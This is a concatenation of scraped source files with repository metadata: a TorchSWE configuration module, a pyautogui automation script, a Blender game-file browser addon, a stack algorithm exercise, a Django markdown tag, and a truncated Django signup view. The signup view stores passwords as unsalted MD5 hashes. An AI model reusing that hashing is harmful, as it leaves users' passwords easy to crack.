----------\n    loc : a tuple of two floats\n        The coordinates of the point source.\n    times : a tuple of floats\n        Times to change flow rates.\n    rates : a tuple of floats\n        Flow rates to use during specified time intervals.\n    \"\"\"\n    # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n    loc: _Tuple[_confloat(strict=True), _confloat(strict=True)] = _Field(..., alias=\"location\")\n    times: _Tuple[_confloat(strict=True), ...]\n    rates: _Tuple[_confloat(strict=True, ge=0.), ...]\n    init_dt: _confloat(strict=True, gt=0.) = _Field(1e-3, alias=\"initial dt\")\n\n    @_validator(\"times\")\n    def val_times(cls, val):\n        \"\"\"Validate the tuple of times.\"\"\"\n        for i in range(1, len(val)):\n            assert val[i] - val[i-1] > 0., f\"{val[i]} is not greater than {val[i-1]}\"\n        return val\n\n    @_validator(\"rates\")\n    def val_rates(cls, val, values):\n        \"\"\"Validate the tuple of rates.\"\"\"\n        try:\n            target = values[\"times\"]\n        except KeyError as err:\n            raise AssertionError(\"must correct `times` first\") from err\n\n        assert len(val) == len(target) + 1, \\\n            f\"the length of rates ({len(val)}) does not match that of times ({len(target)})\"\n\n        return val\n\n\nclass ParamConfig(BaseConfig):\n    \"\"\"An object holding configuration of miscellaneous parameters.\n\n    Attributes\n    ----------\n    gravity : float\n        Gravity in m/sec^2. Default: 9.81\n    theta : float\n        Parameter controlling numerical dissipation. 1.0 < theta < 2.0. Default: 1.3\n    drytol : float\n        Dry tolerance in meters. Default: 1.0e-4.\n    ngh : int\n        Number of ghost cell layers per boundary. At least 2 required.\n    dtype : str\n        The floating number type. Either \"float32\" or \"float64\". Default: \"float64\"\n    \"\"\"\n    # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n    gravity: _confloat(ge=0.) = 9.81\n    theta: _confloat(ge=1., le=2.) = 1.3\n    drytol: _confloat(ge=0.) = _Field(1.0e-4, alias=\"dry tolerance\")\n    ngh: _conint(ge=2) = 2\n    log_steps: _conint(ge=1) = _Field(100, alias=\"print steps\")\n    dtype: _Literal[\"float32\", \"float64\"] = \"float64\"\n\n    @_validator(\"ngh\")\n    def _val_ngh(cls, val):\n        \"\"\"Currently only ngh = 2 is supported.\"\"\"\n        assert val == 2, \"Currently, the solver only supports ngh = 2\"\n        return val\n\n\nclass FluidPropsConfig(BaseConfig):\n    \"\"\"An object holding configuration of fluid properties.\n\n    Attributes\n    ----------\n    ref_mu : float\n        A reference dynamic viscosity in unit mPa-s (= cP = 1e-3 kg/s/m)\n    ref_temp : float\n        The reference temperature at which the `ref_mu` is defined. Unit: Celsius.\n    amb_temp : float\n        The ambient temperature at which the simulation operates. Unit: Celsius.\n    rho : float\n        The density of fluid at `amb_temp`. Unit: kg/m^3\n    nu : float\n        The kinematic viscosity at `amb_temp`. Unit: m^2/s\n    \"\"\"\n    # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n    rho: _confloat(strict=True, gt=0.) = _Field(..., alias=\"density\")\n    ref_mu: _confloat(strict=True, gt=0.) = _Field(..., alias=\"reference mu\")\n    ref_temp: _confloat(strict=True, gt=-273.15) = _Field(..., alias=\"reference temperature\")\n    amb_temp: _confloat(strict=True, gt=-273.15) = _Field(..., alias=\"ambient temperature\")\n    nu : _Optional[_confloat(strict=True, gt=0.)] = _Field(None)\n\n    @_validator(\"nu\")\n    def val_nu(cls, val, values):\n        \"\"\"Validate nu.\"\"\"\n        if val is None:\n            # get dynamic viscosity at ambient temperature (unit: cP) (Lewis-Squires correlation)\n            val = values[\"ref_mu\"]**(-0.2661) + (values[\"amb_temp\"] - values[\"ref_temp\"]) / 233.\n            val = val**(-1./0.2661) * 1e-3 # convert to kg / s / m\n\n        try:\n            val /= values[\"rho\"] # kinematic viscosity (m^2 / s)\n        except KeyError as err:\n            raise AssertionError(\"Correct `density` (or `rho`) first.\") from err\n        return val\n\n\nclass FrictionConfig(BaseConfig):\n    \"\"\"An object holding configuration of bottom friction.\n\n    Attributes\n    ----------\n    file : path-like or None\n        The CF-compliant NetCDF file containing surface roughness data.\n    key : str or None\n        The key of the roughness data in the file.\n    value : float or None\n        A constant roughness for the whole computational domain. See notes.\n    model : str\n        The friction coefficient model. Currently, only \"bellos_et_al_2018\" is available.\n\n    Notes\n    -----\n    Only one of the `file`-`key` pair or `value` can be non-None at the same time.\n    \"\"\"\n    # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n    file: _Optional[_pathlib.Path] = _Field(None, alias=\"roughness file\")\n    key: _Optional[str] = _Field(None, alias=\"roughness key\")\n    xykeys: _Optional[_Tuple[str, str]] = _Field(None, alias=\"roughness xykeys\")\n    value: _Optional[_confloat(strict=True, ge=0.)] = _Field(None, alias=\"roughness\")\n    model: _Literal[\"bellos_et_al_2018\"] = _Field(\"bellos_et_al_2018\", alias=\"coefficient model\")\n\n    @_validator(\"value\")\n    def val_value(cls, val, values):\n        \"\"\"Validate FrictionConfig.value\"\"\"\n        try:\n            if val is None:\n                msg = \"when not using constant roughness, {} must be set\"\n                assert values[\"file\"] is not None, msg.format(\"roughness file\")\n                assert values[\"key\"] is not None, msg.format(\"roughness key\")\n                assert values[\"xykeys\"] is not None, msg.format(\"xykeys\")\n            else:\n                msg = \"when using constant roughness, {} must not be set\"\n                assert values[\"file\"] is None, msg.format(\"roughness file\")\n                assert values[\"key\"] is None, msg.format(\"roughness key\")\n                assert values[\"xykeys\"] is None, msg.format(\"xykeys\")\n        except KeyError as err:\n            raise AssertionError(\"Please fix other fields first.\") from err\n        return val\n\n\nclass Config(BaseConfig):\n    \"\"\"An object holding all configurations of a simulation case.\n\n    Attributes\n    ----------\n    spatial : SpatialConfig\n        Spatial information.\n    temporal : TemporalConfig\n        Temporal control.\n    bc : BCConfig\n        Boundary conditions.\n    ic : ICConfig\n        Initial conditions.\n    topo : TopoConfig\n        Topography information.\n    ptsource : PointSourceConfig\n        Point source configuration.\n    props : FluidPropsConfig\n        Fluid properties.\n    params : ParamConfig\n        Miscellaneous parameters.\n    prehook : None or path-like\n        The path to a Python script that will be executed before running a simulation.\n    case : path-like\n        The path to the case folder.\n    \"\"\"\n    # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n    spatial: SpatialConfig\n    temporal: TemporalConfig\n    bc: BCConfig = _Field(..., alias=\"boundary\")\n    ic: ICConfig = _Field(..., alias=\"initial\")\n    topo: TopoConfig = _Field(..., alias=\"topography\")\n    ptsource: _Optional[PointSourceConfig] = _Field(None, alias=\"point source\")\n    friction: _Optional[FrictionConfig] = _Field(None, alias=\"friction\")\n    props: _Optional[FluidPropsConfig] = _Field(None, alias=\"fluid properties\")\n    params: ParamConfig = _Field(ParamConfig(), alias=\"parameters\")\n    prehook: _Optional[_pathlib.Path]\n    case: _Optional[_pathlib.Path]\n\n    @_validator(\"props\")\n    def val_props(cls, val, values):\n        \"\"\"Validate props.\"\"\"\n        try:\n            if values[\"ptsource\"] is not None and val is None:\n                raise AssertionError(\"When `point source` is present, `fluid properties` must be set\")\n            if values[\"friction\"] is not None and val is None:\n                raise AssertionError(\"When `friction` is present, `fluid properties` must be set\")\n        except KeyError as err:\n            raise AssertionError(\"Please fix other fields first.\") from err\n        return val\n\n\n# register the Config class in yaml with tag !Config\n_add_constructor(\n    \"!Config\",\n    lambda loader, node: Config(**loader.construct_mapping(node, deep=True))\n)\n\n_add_representer(\n    Config,\n    lambda dumper, data: dumper.represent_mapping(\n        tag=\"!Config\", mapping=_load(\n            data.json(by_alias=True), Loader=_Loader),\n        flow_style=True\n    )\n)\n\n\ndef get_config(case: str):\n    \"\"\"Get configuration from a case folder.\n\n    Arguments\n    ---------\n    case : str or os.PathLike\n        The path to the case folder. A file called `config.yaml` must exist in that folder.\n\n    Returns\n    -------\n    torchswe.utils.config.Config\n    \"\"\"\n\n    case = _pathlib.Path(case).expanduser().resolve()\n\n    with open(case.joinpath(\"config.yaml\"), \"r\", encoding=\"utf-8\") as fobj:\n        config = _load(fobj, _Loader)\n\n    assert isinstance(config, Config), \\\n        f\"Failed to parse {case.joinpath('config.yaml')} as a Config object. \" + \\\n        \"Check if `--- !Config` appears in the header of the YAML\"\n\n    return config\n","repo_name":"piyueh/TorchSWE","sub_path":"torchswe/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":20195,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"}
+{"seq_id":"27293658147","text":"import time\nfrom pyautogui import *\n\nwhile True:\n\t# \"민원열람 > 갑부열람\"\n\tpos1 = locateCenterOnScreen(\"gabbu.PNG\", grayscale=True)\n\ttime.sleep(0.5)\n\n\tif pos1 == None:\n\t\ttime.sleep(0.5)\n\t\tcontinue\n\telse:\n\t\t# If multiple vehicles share the same registration number, select the target vehicle ==> \"자동차등록원부 조회\"\n\t\twhile True:\n\t\t\tpos2 = locateCenterOnScreen(\"wonbu_select.PNG\", grayscale=True)\n\t\t\tif pos2 != None:\n\t\t\t\ttime.sleep(0.5)\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\t\n\t\t#press(['tab', 'tab', 'tab', 'tab', 'tab', 'end'])\n\t\ttime.sleep(0.5)\n\n\t\tpress(['tab', 'tab', 'tab', 'tab', 'tab', 'up'])\n\t\t\t\t\t\n\t\tpress('f4')","repo_name":"birdcagedout/SickNTired","sub_path":"gabbu.py","file_name":"gabbu.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"34505255088","text":"from os.path import isabs, dirname\nfrom typing import Collection, Optional, Set\n\nfrom bpy.types import Operator, Context, UIList, UILayout, PropertyGroup, Menu, Panel\nfrom bpy.props import (\n    BoolProperty,\n    StringProperty,\n    IntProperty,\n    EnumProperty,\n    CollectionProperty,\n    PointerProperty,\n)\nimport bpy\n\nfrom plumber.importer import (\n    DisableCommonPanel,\n    GameFileImporterOperator,\n    GameFileImporterOperatorProps,\n    ImporterOperatorProps,\n    update_recent_entries,\n)\n\nfrom .plumber import FileBrowser\nfrom .preferences import Game, AddonPreferences\n\n\nclass ObjectTransform3DSky(Operator):\n    \"\"\"Transform the selected 3D sky objects, based on the active empty object\"\"\"\n\n    bl_idname = \"object.plumber_transform_3d_sky\"\n    bl_label = \"Transform VMF 3D sky\"\n    bl_options = {\"REGISTER\", \"UNDO\"}\n\n    @classmethod\n    def poll(cls, context: Context) -> bool:\n        return (\n            context.active_object and context.active_object.type == \"EMPTY\"\n        ) and context.selected_objects\n\n    def execute(self, context: Context) -> Set[str]:\n        target = context.active_object\n        for obj in context.selected_objects:\n            if obj != target and obj.parent is None:\n                obj.parent = target\n                obj.location -= target.location\n        target.location = (0, 0, 0)\n        return {\"FINISHED\"}\n\n\ndef object_menu_func(self: bpy.types.Menu, context: bpy.types.Context) -> None:\n    self.layout.separator()\n    self.layout.operator(ObjectTransform3DSky.bl_idname)\n\n\nFILE_IMPORTERS = {\n    \"mdl\": \"import_scene.plumber_mdl\",\n    \"vmt\": \"import_scene.plumber_vmt\",\n    \"vmf\": \"import_scene.plumber_vmf\",\n    \"vtf\": \"import_scene.plumber_vtf\",\n}\n\n\ndef create_operator_fn(path: str):\n    [category_name, name] = 
path.split(\".\")\n category = getattr(bpy.ops, category_name)\n return lambda: getattr(category, name)\n\n\nFILE_IMPORTER_OPERATORS = {\n f\".{ext}\": create_operator_fn(path) for ext, path in FILE_IMPORTERS.items()\n}\n\n\ndef get_extension(filename: str) -> str:\n parts = filename.rsplit(\".\", 1)\n if len(parts) < 2:\n return \"\"\n else:\n return parts[1]\n\n\nclass DirEntry(PropertyGroup):\n name: StringProperty(subtype=\"FILE_NAME\")\n path: StringProperty()\n kind: EnumProperty(\n items=(\n (\"DIR\", \"Directory\", \"\", \"FILE_FOLDER\", 0),\n (\"FILE\", \"File\", \"\", \"FILE\", 1),\n ),\n name=\"Type\",\n )\n\n def navigate(self, browser: \"GameFileBrowser\") -> bool:\n if self.kind == \"DIR\":\n if browser.path:\n browser.path += f\"/{self.name}\"\n else:\n browser.path = self.name\n else:\n return False\n return True\n\n\nclass DirEntryList(UIList):\n bl_idname = \"PLUMBER_UL_dir_entry_list\"\n\n use_filter_supported: BoolProperty(\n name=\"Filter supported\",\n default=True,\n options=set(),\n description=\"Whether to only show files that can be imported\",\n )\n\n filter_name: StringProperty(\n name=\"Filter name\",\n default=\"\",\n options=set(),\n description=\"Only show entries which match a specified pattern\",\n )\n\n def draw_item(\n self,\n context: Context,\n layout: UILayout,\n data: \"GameFileBrowser\",\n item: DirEntry,\n icon: int,\n active_data: int,\n active_propname: str,\n index: int,\n ) -> None:\n icon_value = layout.enum_item_icon(item, \"kind\", item.kind)\n\n if self.layout_type in {\"DEFAULT\", \"COMPACT\"}:\n split = layout.split(factor=0.6)\n\n split.label(\n text=item.name,\n icon_value=icon_value,\n )\n\n if index == getattr(active_data, active_propname) and item.kind == \"FILE\":\n extension = get_extension(item.name)\n importer = FILE_IMPORTERS.get(extension)\n\n if importer is not None:\n operator = split.operator(importer, text=\"Import\")\n operator.from_game_fs = True\n operator.filepath = item.path\n operator.game = str(data.game_id)\n\n operator: ExtractGameFile = split.operator(\n ExtractGameFile.bl_idname, text=\"Extract\"\n )\n operator.from_game_fs = True\n operator.source_path = item.path\n operator.game = str(data.game_id)\n operator.filename_ext = extension\n operator.filename = item.name\n\n elif self.layout_type in {\"GRID\"}:\n layout.alignment = \"CENTER\"\n layout.label(text=item.name, icon_value=icon_value)\n\n def draw_filter(self, context: Context, layout: UILayout):\n row = layout.row()\n row.prop(self, \"filter_name\", text=\"\", icon=\"VIEWZOOM\")\n row.prop(self, \"use_filter_supported\")\n\n def filter_items(self, context: Context, data: \"GameFileBrowser\", property: str):\n entries: Collection[DirEntry] = getattr(data, property)\n\n flt_flags = []\n flt_neworder = []\n\n filter_funcs = []\n\n if self.use_filter_supported:\n filter_funcs.append(\n lambda entry: (\n entry.kind != \"FILE\" or get_extension(entry.name) in FILE_IMPORTERS\n )\n )\n\n if self.filter_name:\n filter = self.filter_name.lower()\n filter_funcs.append(lambda entry: filter in entry.name.lower())\n\n if len(filter_funcs) != 0:\n flt_flags = [\n self.bitflag_filter_item\n if all(filter_func(entry) for filter_func in filter_funcs)\n else 0\n for entry in entries\n ]\n\n return flt_flags, flt_neworder\n\n\nclass RecentEntry(PropertyGroup):\n name: StringProperty(subtype=\"FILE_NAME\")\n path: StringProperty()\n\n\nclass RecentEntryList(UIList):\n bl_idname = \"PLUMBER_UL_recent_entry_list\"\n\n def draw_item(\n self,\n context: Context,\n layout: 
UILayout,\n data: \"GameFileBrowser\",\n item: DirEntry,\n icon: int,\n active_data: int,\n active_propname: str,\n index: int,\n ) -> None:\n if self.layout_type in {\"DEFAULT\", \"COMPACT\"}:\n layout.label(text=item.name, icon=\"FILE_FOLDER\")\n\n elif self.layout_type in {\"GRID\"}:\n layout.alignment = \"CENTER\"\n layout.label(text=item.name, icon=\"FILE_FOLDER\")\n\n def draw_filter(self, context: Context, layout: UILayout):\n pass\n\n\nclass GameRecentEntriesItem(PropertyGroup):\n name: StringProperty()\n\n recent_entries: CollectionProperty(type=RecentEntry)\n\n\nclass GameFileBrowser:\n browser: Optional[FileBrowser] = None\n path: str\n\n def __init_subclass__(cls) -> None:\n # unfortunately the self passed to property updates\n # is not a proper class instance of operators,\n # so we need to make update_path browser reading\n # not dependent on self\n\n def update_path(self: GameFileBrowser, context: Context):\n if isabs(self.path):\n self.path = \"\"\n return\n\n normalized = self.path.replace(\"\\\\\", \"/\").rstrip(\"/\")\n if self.path != normalized:\n self.path = normalized\n return\n\n entries = cls.browser.read_dir(self.path)\n self.entries.clear()\n\n for entry in entries:\n bl_entry: DirEntry = self.entries.add()\n bl_entry.name = entry.name()\n bl_entry.kind = entry.kind()\n bl_entry.path = f\"{self.path}/{bl_entry.name}\"\n\n self.entry_index = -1\n\n if len(entries) == 0:\n for ext, get_operator in FILE_IMPORTER_OPERATORS.items():\n if self.path.endswith(ext):\n get_operator()(\n \"INVOKE_DEFAULT\",\n from_game_fs=True,\n filepath=self.path,\n game=str(self.game_id),\n )\n self.path = dirname(self.path)\n return\n\n cls.update_path = update_path\n cls.__annotations__[\"path\"] = StringProperty(name=\"Path\", update=update_path)\n\n game_id: IntProperty(default=-1)\n\n entries: CollectionProperty(type=DirEntry)\n\n def update_entry_index(self, context: Context):\n if self.entry_index != -1:\n entry: DirEntry = self.entries[self.entry_index]\n if entry.navigate(self):\n self.entry_index = -1\n\n entry_index: IntProperty(\n default=-1,\n name=\"Directory entry\",\n update=update_entry_index,\n )\n\n def update_browse_parent(self, context: Context):\n if self.browse_parent:\n path = self.path\n parts = path.rsplit(\"/\", 1)\n if len(parts) < 2:\n self.path = \"\"\n else:\n self.path = parts[0]\n\n self.browse_parent = False\n\n browse_parent: BoolProperty(\n default=False,\n name=\"Parent\",\n update=update_browse_parent,\n )\n\n recent_entries_temp: CollectionProperty(type=RecentEntry)\n\n def update_recent_entry_index(self, context: Context):\n if self.recent_entry_index != -1:\n entry: RecentEntry = self.recent_entries_temp[self.recent_entry_index]\n self.path = entry.path\n self.recent_entry_index = -1\n\n recent_entry_index: IntProperty(\n default=-1,\n name=\"Recent entry\",\n update=update_recent_entry_index,\n )\n\n def open_game(self, context: Context):\n preferences: AddonPreferences = context.preferences.addons[\n __package__\n ].preferences\n\n game: Game = preferences.games[self.game_id]\n type(self).browser = game.get_file_system().browse()\n\n self.update_path(context)\n\n self.recent_entries_temp.clear()\n recent_entries: GameRecentEntriesItem = (\n context.scene.plumber_recent_entries.get(str(self.game_id))\n )\n if recent_entries is not None:\n recent_entry: RecentEntry\n for recent_entry in recent_entries.recent_entries:\n recent_entry_temp: RecentEntry = self.recent_entries_temp.add()\n recent_entry_temp.name = recent_entry.name\n 
recent_entry_temp.path = recent_entry.path\n\n def draw_browser(self, layout: UILayout):\n layout.label(text=\"Files:\")\n row = layout.row()\n\n button_layout = row.column()\n button_layout.enabled = bool(self.path)\n button_layout.prop(self, \"browse_parent\", icon=\"FILE_PARENT\", icon_only=True)\n\n row.prop(self, \"path\", text=\"\")\n\n layout.template_list(\n DirEntryList.bl_idname,\n \"\",\n self,\n \"entries\",\n self,\n \"entry_index\",\n rows=15,\n maxrows=15,\n )\n\n operator: ExtractGameDirectory = layout.operator(\n ExtractGameDirectory.bl_idname, text=\"Extract all\"\n )\n operator.from_game_fs = True\n operator.source_path = self.path\n operator.game = str(self.game_id)\n\n if self.entry_index == -1:\n layout.label(text=\"(select a file to import)\")\n else:\n layout.label(text=\"\")\n\n layout.separator()\n layout.label(text=\"Recent directories:\")\n layout.template_list(\n RecentEntryList.bl_idname,\n \"\",\n self,\n \"recent_entries_temp\",\n self,\n \"recent_entry_index\",\n rows=10,\n maxrows=10,\n sort_reverse=True,\n sort_lock=True,\n )\n\n\nclass GameFileBrowserPropertyGroup(PropertyGroup, GameFileBrowser):\n def update_game(self, context: Context):\n if self.game == \"NONE\":\n GameFileBrowserPropertyGroup.browser = None\n else:\n self.initialize(context)\n\n game: EnumProperty(\n items=AddonPreferences.game_enum_items,\n name=\"Game\",\n description=\"Used for opening required assets\",\n options={\"HIDDEN\"},\n update=update_game,\n )\n\n def initialize(self, context: Context):\n if self.game == \"NONE\":\n return\n else:\n self.game_id = int(self.game)\n self.open_game(context)\n\n def draw_browser(self, layout: UILayout):\n layout.prop(self, \"game\")\n\n if self.game == \"NONE\":\n return\n\n if GameFileBrowserPropertyGroup.browser is None:\n layout.operator(OpenGameFileBrowser.bl_idname)\n return\n\n super().draw_browser(layout)\n\n\nclass GameFileBrowserPanel(Panel):\n bl_idname = \"VIEW3D_PT_plumber_browser\"\n bl_category = \"Plumber\"\n bl_label = \"Game file browser\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n\n browser: GameFileBrowserPropertyGroup = None\n\n def draw(self, context: Context):\n if GameFileBrowserPanel.browser != context.scene.plumber_browser:\n # if scene changed, delete the previous browser\n GameFileBrowserPanel.browser = context.scene.plumber_browser\n GameFileBrowserPropertyGroup.browser = None\n\n GameFileBrowserPanel.browser.draw_browser(self.layout)\n\n\nclass OpenGameFileBrowser(Operator):\n \"\"\"Open the game file browser\"\"\"\n\n bl_idname = \"view3d.plumber_open_file_browser\"\n bl_label = \"Open\"\n bl_options = {\"INTERNAL\"}\n\n def execute(self, context: Context) -> Set[str]:\n GameFileBrowserPanel.browser.initialize(context)\n return {\"FINISHED\"}\n\n\nclass GameFileBrowserOperator(Operator, GameFileBrowser):\n \"\"\"Browse the files of the selected game\"\"\"\n\n bl_idname = \"import_scene.plumber_file_browser\"\n bl_label = \"Browse game files\"\n bl_options = {\"INTERNAL\"}\n\n def invoke(self, context: Context, event) -> Set[str]:\n if self.game_id == -1:\n return {\"CANCELLED\"}\n\n self.open_game(context)\n\n update_recent_entries.browser_operator_entries = self.recent_entries_temp\n\n return context.window_manager.invoke_props_dialog(self)\n\n def draw(self, context: Context):\n self.draw_browser(self.layout)\n\n def execute(self, context: Context) -> Set[str]:\n update_recent_entries.browser_operator_entries = None\n return {\"CANCELLED\"}\n\n\nclass IMPORT_MT_plumber_browse(Menu):\n bl_idname 
= \"IMPORT_MT_plumber_browse\"\n bl_label = \"Browse game files\"\n\n def draw(self, context: Context):\n preferences: AddonPreferences = context.preferences.addons[\n __package__\n ].preferences\n\n for i, game in enumerate(preferences.games):\n self.layout.operator(\n GameFileBrowserOperator.bl_idname,\n text=game.name,\n ).game_id = i\n\n\nclass ExtractGameDirectory(\n GameFileImporterOperator,\n ImporterOperatorProps,\n GameFileImporterOperatorProps,\n DisableCommonPanel,\n):\n \"\"\"Extract a game directory\"\"\"\n\n bl_idname = \"file.plumber_extract_directory\"\n bl_label = \"Extract game files\"\n bl_options = {\"INTERNAL\"}\n\n source_path: StringProperty(options={\"HIDDEN\"})\n\n directory: StringProperty(options={\"HIDDEN\"})\n filepath: None\n filename_ext = \".\"\n use_filter_folder = True\n\n def invoke(self, context: Context, event) -> Set[str]:\n if not self.from_game_fs:\n return {\"CANCELLED\"}\n\n update_recent_entries(context, self.game, self.source_path)\n\n context.window_manager.fileselect_add(self)\n return {\"RUNNING_MODAL\"}\n\n def execute(self, context: Context) -> Set[str]:\n fs = self.get_game_fs(context)\n\n try:\n fs.extract(self.source_path, True, self.directory)\n except OSError as err:\n self.report({\"ERROR\"}, f\"could not export: {err}\")\n return {\"CANCELLED\"}\n\n return {\"FINISHED\"}\n\n\nclass ExtractGameFile(\n GameFileImporterOperator,\n ImporterOperatorProps,\n GameFileImporterOperatorProps,\n DisableCommonPanel,\n):\n \"\"\"Extract a game file\"\"\"\n\n bl_idname = \"file.plumber_extract_file\"\n bl_label = \"Extract game file\"\n bl_options = {\"INTERNAL\"}\n\n source_path: StringProperty(options={\"HIDDEN\"})\n\n filename: StringProperty(options={\"HIDDEN\"})\n check_existing: BoolProperty(options={\"HIDDEN\"}, default=True)\n filename_ext: StringProperty(options={\"HIDDEN\"})\n\n def invoke(self, context: Context, event) -> Set[str]:\n if not self.from_game_fs:\n return {\"CANCELLED\"}\n\n update_recent_entries(context, self.game, dirname(self.source_path))\n\n context.window_manager.fileselect_add(self)\n return {\"RUNNING_MODAL\"}\n\n def execute(self, context: Context) -> Set[str]:\n fs = self.get_game_fs(context)\n\n try:\n fs.extract(self.source_path, False, self.filepath)\n except OSError as err:\n self.report({\"ERROR\"}, f\"could not export: {err}\")\n return {\"CANCELLED\"}\n\n return {\"FINISHED\"}\n\n\nclasses = [\n ObjectTransform3DSky,\n DirEntry,\n DirEntryList,\n RecentEntry,\n RecentEntryList,\n GameRecentEntriesItem,\n GameFileBrowserPropertyGroup,\n OpenGameFileBrowser,\n GameFileBrowserOperator,\n IMPORT_MT_plumber_browse,\n ExtractGameDirectory,\n ExtractGameFile,\n]\n\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n bpy.types.VIEW3D_MT_object.append(object_menu_func)\n\n bpy.types.Scene.plumber_browser = PointerProperty(\n type=GameFileBrowserPropertyGroup, options={\"SKIP_SAVE\"}\n )\n bpy.types.Scene.plumber_recent_entries = CollectionProperty(\n type=GameRecentEntriesItem, options=set()\n )\n\n preferences: AddonPreferences = bpy.context.preferences.addons[\n __package__\n ].preferences\n\n if preferences.enable_file_browser_panel:\n bpy.utils.register_class(GameFileBrowserPanel)\n\n\ndef unregister():\n preferences: AddonPreferences = bpy.context.preferences.addons[\n __package__\n ].preferences\n\n if preferences.enable_file_browser_panel:\n bpy.utils.unregister_class(GameFileBrowserPanel)\n\n del bpy.types.Scene.plumber_recent_entries\n del bpy.types.Scene.plumber_browser\n\n 
bpy.types.VIEW3D_MT_object.remove(object_menu_func)\n\n for cls in reversed(classes):\n bpy.utils.unregister_class(cls)\n","repo_name":"lasa01/Plumber","sub_path":"plumber/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":18495,"program_lang":"python","lang":"en","doc_type":"code","stars":324,"dataset":"github-code","pt":"40"} +{"seq_id":"21691805838","text":"import sys\nn = int(input())\nnums = list(map(int, sys.stdin.readline().split()))\n\nstack = []\nnums.reverse() # 뒤에서 부터 담을거임\nans = []\n\nfor i in range(n):\n while stack and stack[-1]<=nums[i]: # 스택 top이 나보다 작거나 같으면 pop, 나보다 큰 수 나오면 멈춤\n stack.pop()\n\n if stack: # 스택에 뭐가 남아있으면 그게 나랑 가장 가까운 큰 수\n ans.append(stack[-1])\n else: # 아무것도 없으면 내가 제일 큰 수\n ans.append(-1)\n stack.append(nums[i])\n\nans.reverse()\nprint(*ans)","repo_name":"thing-zoo/algorithm-study","sub_path":"BOJ/seeun/4. 스택/17298_오큰수(내가 품).py","file_name":"17298_오큰수(내가 품).py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1845219872","text":"from django import template\nimport markdown\n\nregister = template.Library()\n\n\nclass MarkdownNode(template.Node):\n def __init__(self, nodelist):\n self.nodelist = nodelist\n\n def render(self, context):\n output = self.nodelist.render(context)\n output = markdown.markdown(\n output, extensions=[\"toc\"], extension_configs={\"toc\": {\"anchorlink\": True}}\n )\n return output\n\n\n@register.tag(name=\"markdown\")\ndef do_markdown(parser, token):\n nodelist = parser.parse((\"endmarkdown\",))\n parser.delete_first_token()\n return MarkdownNode(nodelist)\n","repo_name":"hkhanna/django-base","sub_path":"core/templatetags/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22120478797","text":"from django.shortcuts import render, redirect\nfrom BlogApp.forms import *\nfrom BlogApp.models import *\nimport random, hashlib, socket, platform\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.core.mail import send_mail\n\n\ndef signup(request):\n if request.method == \"POST\":\n user_form = UserForm(request.POST)\n name_form = NameForm(request.POST)\n gender_form = GenderForm(request.POST)\n bd_form = BirthDayForm(request.POST)\n\n if user_form.is_valid() and name_form.is_valid() and gender_form.is_valid() and bd_form.is_valid():\n name = name_form.cleaned_data['fname']\n surname = name_form.cleaned_data['lname']\n NameTable.objects.create(fname=name, lname=surname)\n name_ref = NameTable.objects.filter(fname=name, lname=surname).last()\n\n gender = gender_form.cleaned_data['gender']\n GenderTable.objects.create(gender=gender)\n gender_ref = GenderTable.objects.filter(gender=gender).last()\n\n birthday = bd_form.cleaned_data['birthday']\n birthmonth = bd_form.cleaned_data['birthmonth']\n birthyear = bd_form.cleaned_data['birthyear']\n BirthdayTable.objects.create(birthday=birthday, birthmonth=birthmonth, birthyear=birthyear)\n bd_ref = BirthdayTable.objects.filter(birthday=birthday, birthmonth=birthmonth, birthyear=birthyear).last()\n\n email = user_form.cleaned_data['email']\n psd = user_form.cleaned_data['confirm_password']\n password = hashlib.md5(psd.encode()).hexdigest()\n email_verification_code = random.randint(10000,1000000)\n\n ProfilePhotoTable.objects.create(profile_photo=\"default\")\n pp_ref = 
ProfilePhotoTable.objects.filter(profile_photo=\"default\").last()\n\n device_name = socket.gethostname()\n ip_address = socket.gethostbyname(socket.gethostname())\n current_os = platform.platform()\n os_quality = platform.system()\n machine_type = platform.machine()\n device_details = platform.uname()\n\n DeviceDetailsTable.objects.create(device_name=device_name, ip_address=ip_address, current_os=current_os, os_quality=os_quality, machine_type=machine_type, device_details=device_details)\n\n device_ref = DeviceDetailsTable.objects.filter(device_name=device_name, ip_address=ip_address, current_os=current_os, os_quality=os_quality, machine_type=machine_type, device_details=device_details).last()\n\n name_obj = NameTable.objects.get(id=name_ref.id)\n gender_obj = GenderTable.objects.get(id=gender_ref.id)\n bd_obj = BirthdayTable.objects.get(id=bd_ref.id)\n pp_obj = ProfilePhotoTable.objects.get(id=pp_ref.id)\n device_obj = DeviceDetailsTable.objects.get(id=device_ref.id)\n\n UserTable.objects.create(email_address = email, email_verification_code = email_verification_code, password=password, name_table = name_obj, gender_table=gender_obj, birthday_table = bd_obj, profile_completion = 40, pp_table=pp_obj, device_table=device_obj)\n\n subject = \"Demo App Email Verification Code.\"\n sender = settings.EMAIL_HOST_USER\n receiver = [[email], ]\n body = f\"Hello {name} {surname},\\nWelcome to my demo testing web application. Thanks for your kind interest and help me to test the app performance.\\nYour demo app verification code is {email_verification_code}. Don't share this code with others for your account safety.\\nThanks, Engr. Shaumik Ghosh.\"\n send_mail(subject, body, sender, receiver)\n\n msg = f\"Hello {name} {surname}, An email verification code has been sent to your email from {sender}. Check your email and collect the code with 6 digits then verify your email. 
